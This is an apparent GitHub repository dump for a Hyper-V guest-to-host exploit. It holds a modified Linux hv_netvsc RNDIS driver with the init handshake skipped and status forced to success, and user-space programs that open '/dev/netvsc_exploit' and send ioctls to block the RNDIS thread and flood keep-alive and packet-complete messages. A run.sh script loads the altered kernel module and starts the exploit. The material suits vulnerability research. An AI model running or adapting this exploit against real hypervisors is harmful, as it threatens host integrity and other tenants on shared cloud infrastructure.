828 | sizeof(u32)); 829 | if (!request) 830 | return -ENOMEM; 831 | 832 | 833 | /* Setup the rndis set */ 834 | set = &request->request_msg.msg.set_req; 835 | set->oid = RNDIS_OID_GEN_CURRENT_PACKET_FILTER; 836 | set->info_buflen = sizeof(u32); 837 | set->info_buf_offset = sizeof(struct rndis_set_request); 838 | 839 | memcpy((void *)(unsigned long)set + sizeof(struct rndis_set_request), 840 | &new_filter, sizeof(u32)); 841 | 842 | ret = rndis_filter_send_request(dev, request); 843 | if (ret == 0) 844 | wait_for_completion(&request->wait_event); 845 | 846 | put_rndis_request(dev, request); 847 | 848 | return ret; 849 | } 850 | 851 | static void rndis_set_multicast(struct work_struct *w) 852 | { 853 | struct rndis_device *rdev 854 | = container_of(w, struct rndis_device, mcast_work); 855 | 856 | if (rdev->ndev->flags & IFF_PROMISC) 857 | rndis_filter_set_packet_filter(rdev, 858 | NDIS_PACKET_TYPE_PROMISCUOUS); 859 | else 860 | rndis_filter_set_packet_filter(rdev, 861 | NDIS_PACKET_TYPE_BROADCAST | 862 | NDIS_PACKET_TYPE_ALL_MULTICAST | 863 | NDIS_PACKET_TYPE_DIRECTED); 864 | } 865 | 866 | void rndis_filter_update(struct netvsc_device *nvdev) 867 | { 868 | struct rndis_device *rdev = nvdev->extension; 869 | 870 | schedule_work(&rdev->mcast_work); 871 | } 872 | 873 | static int rndis_filter_init_device(struct rndis_device *dev, 874 | struct netvsc_device *nvdev) 875 | { 876 | struct rndis_request *request; 877 | struct rndis_initialize_request *init; 878 | struct rndis_initialize_complete *init_complete; 879 | u32 status; 880 | int ret; 881 | 882 | request = get_rndis_request(dev, RNDIS_MSG_INIT, 883 | RNDIS_MESSAGE_SIZE(struct rndis_initialize_request)); 884 | if (!request) { 885 | ret = -ENOMEM; 886 | goto cleanup; 887 | } 888 | 889 | /* Setup the rndis set */ 890 | init = &request->request_msg.msg.init_req; 891 | init->major_ver = RNDIS_MAJOR_VERSION; 892 | init->minor_ver = RNDIS_MINOR_VERSION; 893 | init->max_xfer_size = 0x4000; 894 | 895 | dev->state = RNDIS_DEV_INITIALIZING; 896 | 897 | /* 898 | in order to send NVSP_MSG1_TYPE_SEND_RECV_BUF we need to skip send RNDIS_MSG_INIT 899 | message 900 | */ 901 | 902 | /*ret = rndis_filter_send_request(dev, request); 903 | if (ret != 0) { 904 | dev->state = RNDIS_DEV_UNINITIALIZED; 905 | goto cleanup; 906 | }*/ 907 | 908 | //wait_for_completion(&request->wait_event); 909 | 910 | init_complete = &request->response_msg.msg.init_complete; 911 | status = init_complete->status; 912 | status = RNDIS_STATUS_SUCCESS; 913 | if (status == RNDIS_STATUS_SUCCESS) { 914 | dev->state = RNDIS_DEV_INITIALIZED; 915 | nvdev->max_pkt = RNDIS_MAX_PKT_DEFAULT; 916 | nvdev->pkt_align = RNDIS_PKT_ALIGN_DEFAULT; 917 | //printk("[*]hv_netvsc:max_pkt:%d pkt_align:%d\n", nvdev->max_pkt, nvdev->pkt_align); 918 | ret = 0; 919 | } else { 920 | dev->state = RNDIS_DEV_UNINITIALIZED; 921 | ret = -EINVAL; 922 | } 923 | 924 | cleanup: 925 | if (request) 926 | put_rndis_request(dev, request); 927 | 928 | return ret; 929 | } 930 | 931 | static bool netvsc_device_idle(const struct netvsc_device *nvdev) 932 | { 933 | int i; 934 | 935 | for (i = 0; i < nvdev->num_chn; i++) { 936 | const struct netvsc_channel *nvchan = &nvdev->chan_table[i]; 937 | 938 | if (nvchan->mrc.first != nvchan->mrc.next) 939 | return false; 940 | 941 | if (atomic_read(&nvchan->queue_sends) > 0) 942 | return false; 943 | } 944 | 945 | return true; 946 | } 947 | 948 | static void rndis_filter_halt_device(struct rndis_device *dev) 949 | { 950 | struct rndis_request *request; 951 | struct rndis_halt_request *halt; 952 | struct net_device_context *net_device_ctx = netdev_priv(dev->ndev); 953 | struct netvsc_device *nvdev = rtnl_dereference(net_device_ctx->nvdev); 954 | 955 | /* Attempt to do a rndis device halt */ 956 | request = get_rndis_request(dev, RNDIS_MSG_HALT, 957 | RNDIS_MESSAGE_SIZE(struct rndis_halt_request)); 958 | if (!request) 959 | goto cleanup; 960 | 961 | /* Setup the rndis set */ 962 | halt = &request->request_msg.msg.halt_req; 963 | halt->req_id = atomic_inc_return(&dev->new_req_id); 964 | 965 | /* Ignore return since this msg is optional. */ 966 | rndis_filter_send_request(dev, request); 967 | 968 | dev->state = RNDIS_DEV_UNINITIALIZED; 969 | 970 | cleanup: 971 | nvdev->destroy = true; 972 | 973 | /* Force flag to be ordered before waiting */ 974 | wmb(); 975 | 976 | /* Wait for all send completions */ 977 | wait_event(nvdev->wait_drain, netvsc_device_idle(nvdev)); 978 | 979 | if (request) 980 | put_rndis_request(dev, request); 981 | } 982 | 983 | static int rndis_filter_open_device(struct rndis_device *dev) 984 | { 985 | int ret; 986 | 987 | if (dev->state != RNDIS_DEV_INITIALIZED) 988 | return 0; 989 | 990 | ret = rndis_filter_set_packet_filter(dev, 991 | NDIS_PACKET_TYPE_BROADCAST | 992 | NDIS_PACKET_TYPE_ALL_MULTICAST | 993 | NDIS_PACKET_TYPE_DIRECTED); 994 | if (ret == 0) 995 | dev->state = RNDIS_DEV_DATAINITIALIZED; 996 | 997 | return ret; 998 | } 999 | 1000 | static int rndis_filter_close_device(struct rndis_device *dev) 1001 | { 1002 | int ret; 1003 | 1004 | if (dev->state != RNDIS_DEV_DATAINITIALIZED) 1005 | return 0; 1006 | 1007 | /* Make sure rndis_set_multicast doesn't re-enable filter! */ 1008 | cancel_work_sync(&dev->mcast_work); 1009 | 1010 | ret = rndis_filter_set_packet_filter(dev, 0); 1011 | if (ret == -ENODEV) 1012 | ret = 0; 1013 | 1014 | if (ret == 0) 1015 | dev->state = RNDIS_DEV_INITIALIZED; 1016 | 1017 | return ret; 1018 | } 1019 | 1020 | static void netvsc_sc_open(struct vmbus_channel *new_sc) 1021 | { 1022 | struct net_device *ndev = 1023 | hv_get_drvdata(new_sc->primary_channel->device_obj); 1024 | struct net_device_context *ndev_ctx = netdev_priv(ndev); 1025 | struct netvsc_device *nvscdev; 1026 | u16 chn_index = new_sc->offermsg.offer.sub_channel_index; 1027 | struct netvsc_channel *nvchan; 1028 | int ret; 1029 | 1030 | /* This is safe because this callback only happens when 1031 | * new device is being setup and waiting on the channel_init_wait. 1032 | */ 1033 | nvscdev = rcu_dereference_raw(ndev_ctx->nvdev); 1034 | if (!nvscdev || chn_index >= nvscdev->num_chn) 1035 | return; 1036 | 1037 | nvchan = nvscdev->chan_table + chn_index; 1038 | 1039 | /* Because the device uses NAPI, all the interrupt batching and 1040 | * control is done via Net softirq, not the channel handling 1041 | */ 1042 | set_channel_read_mode(new_sc, HV_CALL_ISR); 1043 | 1044 | /* Set the channel before opening.*/ 1045 | nvchan->channel = new_sc; 1046 | printk("[*]hv_netvsc netvsc_sc_open channel:0x%010x\n", new_sc); 1047 | ret = vmbus_open(new_sc, nvscdev->ring_size * PAGE_SIZE, 1048 | nvscdev->ring_size * PAGE_SIZE, NULL, 0, 1049 | netvsc_channel_cb, nvchan); 1050 | if (ret == 0) 1051 | napi_enable(&nvchan->napi); 1052 | else 1053 | netdev_notice(ndev, "sub channel open failed: %d\n", ret); 1054 | 1055 | if (atomic_inc_return(&nvscdev->open_chn) == nvscdev->num_chn) 1056 | wake_up(&nvscdev->subchan_open); 1057 | } 1058 | 1059 | /* Open sub-channels after completing the handling of the device probe. 1060 | * This breaks overlap of processing the host message for the 1061 | * new primary channel with the initialization of sub-channels. 1062 | */ 1063 | void rndis_set_subchannel(struct work_struct *w) 1064 | { 1065 | struct netvsc_device *nvdev 1066 | = container_of(w, struct netvsc_device, subchan_work); 1067 | struct nvsp_message *init_packet = &nvdev->channel_init_pkt; 1068 | struct net_device_context *ndev_ctx; 1069 | struct rndis_device *rdev; 1070 | struct net_device *ndev; 1071 | struct hv_device *hv_dev; 1072 | int i, ret; 1073 | 1074 | if (!rtnl_trylock()) { 1075 | schedule_work(w); 1076 | return; 1077 | } 1078 | 1079 | rdev = nvdev->extension; 1080 | if (!rdev) 1081 | goto unlock; /* device was removed */ 1082 | 1083 | ndev = rdev->ndev; 1084 | ndev_ctx = netdev_priv(ndev); 1085 | hv_dev = ndev_ctx->device_ctx; 1086 | 1087 | memset(init_packet, 0, sizeof(struct nvsp_message)); 1088 | init_packet->hdr.msg_type = NVSP_MSG5_TYPE_SUBCHANNEL; 1089 | init_packet->msg.v5_msg.subchn_req.op = NVSP_SUBCHANNEL_ALLOCATE; 1090 | init_packet->msg.v5_msg.subchn_req.num_subchannels = 1091 | nvdev->num_chn - 1; 1092 | printk("[*]hv_netvsc: vmbus_sendpacket NVSP_MSG5_TYPE_SUBCHANNEL\n"); 1093 | ret = vmbus_sendpacket(hv_dev->channel, init_packet, 1094 | sizeof(struct nvsp_message), 1095 | (unsigned long)init_packet, 1096 | VM_PKT_DATA_INBAND, 1097 | VMBUS_DATA_PACKET_FLAG_COMPLETION_REQUESTED); 1098 | if (ret) { 1099 | netdev_err(ndev, "sub channel allocate send failed: %d\n", ret); 1100 | goto failed; 1101 | } 1102 | 1103 | wait_for_completion(&nvdev->channel_init_wait); 1104 | if (init_packet->msg.v5_msg.subchn_comp.status != NVSP_STAT_SUCCESS) { 1105 | netdev_err(ndev, "sub channel request failed\n"); 1106 | goto failed; 1107 | } 1108 | 1109 | nvdev->num_chn = 1 + 1110 | init_packet->msg.v5_msg.subchn_comp.num_subchannels; 1111 | 1112 | /* wait for all sub channels to open */ 1113 | wait_event(nvdev->subchan_open, 1114 | atomic_read(&nvdev->open_chn) == nvdev->num_chn); 1115 | 1116 | /* ignore failues from setting rss parameters, still have channels */ 1117 | rndis_filter_set_rss_param(rdev, netvsc_hash_key); 1118 | 1119 | netif_set_real_num_tx_queues(ndev, nvdev->num_chn); 1120 | netif_set_real_num_rx_queues(ndev, nvdev->num_chn); 1121 | 1122 | rtnl_unlock(); 1123 | return; 1124 | 1125 | failed: 1126 | /* fallback to only primary channel */ 1127 | for (i = 1; i < nvdev->num_chn; i++) 1128 | netif_napi_del(&nvdev->chan_table[i].napi); 1129 | 1130 | nvdev->max_chn = 1; 1131 | nvdev->num_chn = 1; 1132 | unlock: 1133 | rtnl_unlock(); 1134 | } 1135 | 1136 | struct netvsc_device *rndis_filter_device_add(struct hv_device *dev, 1137 | struct netvsc_device_info *device_info) 1138 | { 1139 | struct net_device *net = hv_get_drvdata(dev); 1140 | struct net_device_context *net_device_ctx = netdev_priv(net); 1141 | struct netvsc_device *net_device; 1142 | struct rndis_device *rndis_device; 1143 | struct ndis_offload hwcaps; 1144 | struct ndis_offload_params offloads; 1145 | struct ndis_recv_scale_cap rsscap; 1146 | u32 rsscap_size = sizeof(struct ndis_recv_scale_cap); 1147 | unsigned int gso_max_size = GSO_MAX_SIZE; 1148 | u32 mtu, size; 1149 | const struct cpumask *node_cpu_mask; 1150 | u32 num_possible_rss_qs; 1151 | int i, ret; 1152 | 1153 | rndis_device = get_rndis_device(); 1154 | if (!rndis_device) 1155 | return ERR_PTR(-ENODEV); 1156 | 1157 | /* 1158 | * Let the inner driver handle this first to create the netvsc channel 1159 | * NOTE! Once the channel is created, we may get a receive callback 1160 | * (RndisFilterOnReceive()) before this call is completed 1161 | */ 1162 | net_device = netvsc_device_add(dev, device_info); 1163 | if (IS_ERR(net_device)) { 1164 | kfree(rndis_device); 1165 | return net_device; 1166 | } 1167 | 1168 | /* Initialize the rndis device */ 1169 | net_device->max_chn = 1; 1170 | net_device->num_chn = 1; 1171 | 1172 | net_device->extension = rndis_device; 1173 | rndis_device->ndev = net; 1174 | 1175 | 1176 | /* Send the rndis initialization message */ 1177 | 1178 | ret = rndis_filter_init_device(rndis_device, net_device); 1179 | if (ret != 0) 1180 | goto err_dev_remv; 1181 | 1182 | 1183 | /* Get the MTU from the host */ 1184 | size = sizeof(u32); 1185 | ret = rndis_filter_query_device(rndis_device, net_device, 1186 | RNDIS_OID_GEN_MAXIMUM_FRAME_SIZE, 1187 | &mtu, &size); 1188 | if (ret == 0 && size == sizeof(u32) && mtu < net->mtu) 1189 | net->mtu = mtu; 1190 | 1191 | /* Get the mac address */ 1192 | ret = rndis_filter_query_device_mac(rndis_device, net_device); 1193 | if (ret != 0) 1194 | goto err_dev_remv; 1195 | 1196 | memcpy(device_info->mac_adr, rndis_device->hw_mac_adr, ETH_ALEN); 1197 | 1198 | /* Find HW offload capabilities */ 1199 | ret = rndis_query_hwcaps(rndis_device, net_device, &hwcaps); 1200 | if (ret != 0) 1201 | goto err_dev_remv; 1202 | 1203 | /* A value of zero means "no change"; now turn on what we want. */ 1204 | memset(&offloads, 0, sizeof(struct ndis_offload_params)); 1205 | 1206 | /* Linux does not care about IP checksum, always does in kernel */ 1207 | offloads.ip_v4_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_DISABLED; 1208 | 1209 | /* Compute tx offload settings based on hw capabilities */ 1210 | net->hw_features = NETIF_F_RXCSUM; 1211 | 1212 | if ((hwcaps.csum.ip4_txcsum & NDIS_TXCSUM_ALL_TCP4) == NDIS_TXCSUM_ALL_TCP4) { 1213 | /* Can checksum TCP */ 1214 | net->hw_features |= NETIF_F_IP_CSUM; 1215 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV4_TCP; 1216 | 1217 | offloads.tcp_ip_v4_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1218 | 1219 | if (hwcaps.lsov2.ip4_encap & NDIS_OFFLOAD_ENCAP_8023) { 1220 | offloads.lso_v2_ipv4 = NDIS_OFFLOAD_PARAMETERS_LSOV2_ENABLED; 1221 | net->hw_features |= NETIF_F_TSO; 1222 | 1223 | if (hwcaps.lsov2.ip4_maxsz < gso_max_size) 1224 | gso_max_size = hwcaps.lsov2.ip4_maxsz; 1225 | } 1226 | 1227 | if (hwcaps.csum.ip4_txcsum & NDIS_TXCSUM_CAP_UDP4) { 1228 | offloads.udp_ip_v4_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1229 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV4_UDP; 1230 | } 1231 | } 1232 | 1233 | if ((hwcaps.csum.ip6_txcsum & NDIS_TXCSUM_ALL_TCP6) == NDIS_TXCSUM_ALL_TCP6) { 1234 | net->hw_features |= NETIF_F_IPV6_CSUM; 1235 | 1236 | offloads.tcp_ip_v6_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1237 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV6_TCP; 1238 | 1239 | if ((hwcaps.lsov2.ip6_encap & NDIS_OFFLOAD_ENCAP_8023) && 1240 | (hwcaps.lsov2.ip6_opts & NDIS_LSOV2_CAP_IP6) == NDIS_LSOV2_CAP_IP6) { 1241 | offloads.lso_v2_ipv6 = NDIS_OFFLOAD_PARAMETERS_LSOV2_ENABLED; 1242 | net->hw_features |= NETIF_F_TSO6; 1243 | 1244 | if (hwcaps.lsov2.ip6_maxsz < gso_max_size) 1245 | gso_max_size = hwcaps.lsov2.ip6_maxsz; 1246 | } 1247 | 1248 | if (hwcaps.csum.ip6_txcsum & NDIS_TXCSUM_CAP_UDP6) { 1249 | offloads.udp_ip_v6_csum = NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED; 1250 | net_device_ctx->tx_checksum_mask |= TRANSPORT_INFO_IPV6_UDP; 1251 | } 1252 | } 1253 | 1254 | netif_set_gso_max_size(net, gso_max_size); 1255 | 1256 | ret = rndis_filter_set_offload_params(net, net_device, &offloads); 1257 | if (ret) 1258 | goto err_dev_remv; 1259 | 1260 | rndis_filter_query_device_link_status(rndis_device, net_device); 1261 | 1262 | netdev_dbg(net, "Device MAC %pM link state %s\n", 1263 | rndis_device->hw_mac_adr, 1264 | rndis_device->link_state ? "down" : "up"); 1265 | 1266 | if (net_device->nvsp_version < NVSP_PROTOCOL_VERSION_5) 1267 | return net_device; 1268 | 1269 | rndis_filter_query_link_speed(rndis_device, net_device); 1270 | 1271 | /* vRSS setup */ 1272 | memset(&rsscap, 0, rsscap_size); 1273 | ret = rndis_filter_query_device(rndis_device, net_device, 1274 | OID_GEN_RECEIVE_SCALE_CAPABILITIES, 1275 | &rsscap, &rsscap_size); 1276 | if (ret || rsscap.num_recv_que < 2) 1277 | goto out; 1278 | 1279 | /* 1280 | * We will limit the VRSS channels to the number CPUs in the NUMA node 1281 | * the primary channel is currently bound to. 1282 | * 1283 | * This also guarantees that num_possible_rss_qs <= num_online_cpus 1284 | */ 1285 | node_cpu_mask = cpumask_of_node(cpu_to_node(dev->channel->target_cpu)); 1286 | num_possible_rss_qs = min_t(u32, cpumask_weight(node_cpu_mask), 1287 | rsscap.num_recv_que); 1288 | 1289 | net_device->max_chn = min_t(u32, VRSS_CHANNEL_MAX, num_possible_rss_qs); 1290 | 1291 | /* We will use the given number of channels if available. */ 1292 | net_device->num_chn = min(net_device->max_chn, device_info->num_chn); 1293 | 1294 | for (i = 0; i < ITAB_NUM; i++) 1295 | rndis_device->ind_table[i] = ethtool_rxfh_indir_default(i, 1296 | net_device->num_chn); 1297 | 1298 | atomic_set(&net_device->open_chn, 1); 1299 | vmbus_set_sc_create_callback(dev->channel, netvsc_sc_open); 1300 | 1301 | for (i = 1; i < net_device->num_chn; i++) { 1302 | ret = netvsc_alloc_recv_comp_ring(net_device, i); 1303 | if (ret) { 1304 | while (--i != 0) 1305 | vfree(net_device->chan_table[i].mrc.slots); 1306 | goto out; 1307 | } 1308 | } 1309 | 1310 | for (i = 1; i < net_device->num_chn; i++) 1311 | netif_napi_add(net, &net_device->chan_table[i].napi, 1312 | netvsc_poll, NAPI_POLL_WEIGHT); 1313 | 1314 | if (net_device->num_chn > 1) 1315 | schedule_work(&net_device->subchan_work); 1316 | 1317 | out: 1318 | /* if unavailable, just proceed with one queue */ 1319 | if (ret) { 1320 | net_device->max_chn = 1; 1321 | net_device->num_chn = 1; 1322 | } 1323 | 1324 | return net_device; 1325 | 1326 | err_dev_remv: 1327 | rndis_filter_device_remove(dev, net_device); 1328 | return ERR_PTR(ret); 1329 | } 1330 | 1331 | void rndis_filter_device_remove(struct hv_device *dev, 1332 | struct netvsc_device *net_dev) 1333 | { 1334 | struct rndis_device *rndis_dev = net_dev->extension; 1335 | 1336 | /* Halt and release the rndis device */ 1337 | rndis_filter_halt_device(rndis_dev); 1338 | 1339 | net_dev->extension = NULL; 1340 | 1341 | netvsc_device_remove(dev); 1342 | kfree(rndis_dev); 1343 | } 1344 | 1345 | int rndis_filter_open(struct netvsc_device *nvdev) 1346 | { 1347 | if (!nvdev) 1348 | return -EINVAL; 1349 | 1350 | if (atomic_inc_return(&nvdev->open_cnt) != 1) 1351 | return 0; 1352 | 1353 | return rndis_filter_open_device(nvdev->extension); 1354 | } 1355 | 1356 | int rndis_filter_close(struct netvsc_device *nvdev) 1357 | { 1358 | if (!nvdev) 1359 | return -EINVAL; 1360 | 1361 | if (atomic_dec_return(&nvdev->open_cnt) != 0) 1362 | return 0; 1363 | 1364 | return rndis_filter_close_device(nvdev->extension); 1365 | } 1366 | 1367 | bool rndis_filter_opened(const struct netvsc_device *nvdev) 1368 | { 1369 | return atomic_read(&nvdev->open_cnt) > 0; 1370 | } 1371 | -------------------------------------------------------------------------------- /ring3/hyper_v: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/ring3/hyper_v -------------------------------------------------------------------------------- /ring3/hyper_v.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "hyper_v.h" 6 | 7 | 8 | #define HYPERV_NETVSC_DEV_NAME "/dev/netvsc_exploit" 9 | 10 | typedef unsigned int u32; 11 | typedef _Bool bool; 12 | 13 | int main() 14 | { 15 | char buf[256]; 16 | bool block; 17 | int ret; 18 | int fd = open(HYPERV_NETVSC_DEV_NAME, O_RDWR); 19 | if(-1 == fd) 20 | { 21 | perror("[*]open netvsc_exploit fail."); 22 | goto __EXIT; 23 | } 24 | 25 | memset(buf, 0, sizeof(buf)); 26 | 27 | unsigned int recv_buf_size = 0x4B * 0x1000; 28 | 29 | 30 | 31 | /*printf("[*]hyper_v: send first rndis query.\n"); 32 | ret = ioctl(fd, HYPERV_IOCTL_QUERY, &recv_buf_size, sizeof(recv_buf_size)); 33 | if(0 != ret) 34 | { 35 | perror("[*]hyper_v send rndis query fail."); 36 | goto __EXIT; 37 | } 38 | 39 | 40 | printf("[*]hyper_v: block rndis thread.\n"); 41 | block = 1; 42 | ret = ioctl(fd, HYPERV_IOCTL_SET_BLOCK_RNDIS_THREAD, &block, sizeof(block)); 43 | if(0 != ret) 44 | { 45 | perror("[*]hyper_v: block rndis thread fail."); 46 | goto __EXIT; 47 | } 48 | 49 | printf("[*]hyper_v: send second rndis query.\n"); 50 | ret = ioctl(fd, HYPERV_IOCTL_QUERY, &recv_buf_size, sizeof(recv_buf_size)); 51 | if(0 != ret) 52 | { 53 | perror("[*]hyper_v send rndis query fail."); 54 | goto __EXIT; 55 | } 56 | 57 | printf("[*]press any key to continue......\n"); 58 | getchar(); 59 | printf("[*]hyper_v: send rndis pkt comp.\n"); 60 | block = 0;*/ 61 | /*ret = ioctl(fd, HYPERV_IOCTL_SEND_PKT_COMPLETE, &block, sizeof(block)); 62 | if(0 != ret) 63 | { 64 | perror("[*]hyper_v: send rndis send pkt comp fail."); 65 | goto __EXIT; 66 | }*/ 67 | 68 | 69 | /*printf("[*]hyper_v: send second rndis query.\n"); 70 | ret = ioctl(fd, HYPERV_IOCTL_QUERY, &recv_buf_size, sizeof(recv_buf_size)); 71 | if(0 != ret) 72 | { 73 | perror("[*]hyper_v send rndis query fail."); 74 | goto __EXIT; 75 | }*/ 76 | 77 | 78 | 79 | printf("[*]hyper_v: block rndis thread.\n"); 80 | block = 1; 81 | ret = ioctl(fd, HYPERV_IOCTL_SET_BLOCK_RNDIS_THREAD, &block, sizeof(block)); 82 | if(0 != ret) 83 | { 84 | perror("[*]hyper_v: block rndis thread fail."); 85 | goto __EXIT; 86 | } 87 | 88 | for(int i=0; i<10; i++) 89 | { 90 | printf("[*]hyper_v: send %d rndis keep alive.\n", i); 91 | ret = ioctl(fd, HYPERV_IOCTL_SEND_KEEPALIVE, &recv_buf_size, sizeof(recv_buf_size)); 92 | if(0 != ret) 93 | { 94 | perror("[*]hyper_v send rndis keep alive."); 95 | goto __EXIT; 96 | } 97 | } 98 | 99 | 100 | /*printf("[*]press any key to continue......\n"); 101 | getchar(); 102 | printf("[*]hyper_v: send rndis pkt comp.\n"); 103 | block = 0; 104 | ret = ioctl(fd, HYPERV_IOCTL_SET_BLOCK_RNDIS_THREAD, &block, sizeof(block)); 105 | if(0 != ret) 106 | { 107 | perror("[*]hyper_v: send rndis send pkt comp fail."); 108 | goto __EXIT; 109 | } 110 | 111 | printf("[*]hyper_v: unblock rndis thread.\n"); 112 | ret = ioctl(fd, HYPERV_IOCTL_SEND_PKT_COMPLETE, &block, sizeof(block)); 113 | if(0 != ret) 114 | { 115 | perror("[*]hyper_v: unblock rndis thread fail."); 116 | goto __EXIT; 117 | }*/ 118 | 119 | __EXIT: 120 | if(-1 != fd) 121 | { 122 | close(fd); 123 | } 124 | return 0; 125 | } -------------------------------------------------------------------------------- /ring3/hyper_v.h: -------------------------------------------------------------------------------- 1 | /home/fuzzer/code/hyper_v_exploit/ring0/hyperv/hyper_v.h -------------------------------------------------------------------------------- /ring3/hyper_v2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/4B5F5F4B/HyperV/b1fba46337217abc9280dbd374e3b4e7ee6ce17b/ring3/hyper_v2 -------------------------------------------------------------------------------- /ring3/hyper_v2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "hyper_v.h" 6 | 7 | 8 | #define HYPERV_NETVSC_DEV_NAME "/dev/netvsc_exploit" 9 | 10 | typedef unsigned int u32; 11 | typedef _Bool bool; 12 | 13 | int main() 14 | { 15 | char buf[256]; 16 | bool block; 17 | int ret; 18 | int fd = open(HYPERV_NETVSC_DEV_NAME, O_RDWR); 19 | if(-1 == fd) 20 | { 21 | perror("[*]open netvsc_exploit fail."); 22 | goto __EXIT; 23 | } 24 | 25 | memset(buf, 0, sizeof(buf)); 26 | 27 | unsigned int recv_buf_size = 0x4B * 0x1000; 28 | 29 | printf("[*]hyper_v: unblock rndis thread.\n"); 30 | ret = ioctl(fd, HYPERV_IOCTL_SET_BLOCK_RNDIS_THREAD, &block, sizeof(block)); 31 | if(0 != ret) 32 | { 33 | perror("[*]hyper_v: unblock rndis thread fail."); 34 | goto __EXIT; 35 | }printf("[*]hyper_v: send rndis pkt comp.\n"); 36 | block = 0; 37 | ret = ioctl(fd, HYPERV_IOCTL_SEND_PKT_COMPLETE, &block, sizeof(block)); 38 | if(0 != ret) 39 | { 40 | perror("[*]hyper_v: send rndis send pkt comp fail."); 41 | goto __EXIT; 42 | } 43 | 44 | 45 | printf("[*]hyper_v: send %d rndis query.\n", 0); 46 | /*ret = ioctl(fd, HYPERV_IOCTL_QUERY, &recv_buf_size, sizeof(recv_buf_size)); 47 | if(0 != ret) 48 | { 49 | perror("[*]hyper_v send rndis query fail."); 50 | goto __EXIT; 51 | }*/ 52 | 53 | __EXIT: 54 | if(-1 != fd) 55 | { 56 | close(fd); 57 | } 58 | return 0; 59 | } -------------------------------------------------------------------------------- /run.sh: -------------------------------------------------------------------------------- 1 | rmmod hv_netvsc 2 | insmod ring0/hyperv/hv_netvsc.ko 3 | ./ring3/hyper_v --------------------------------------------------------------------------------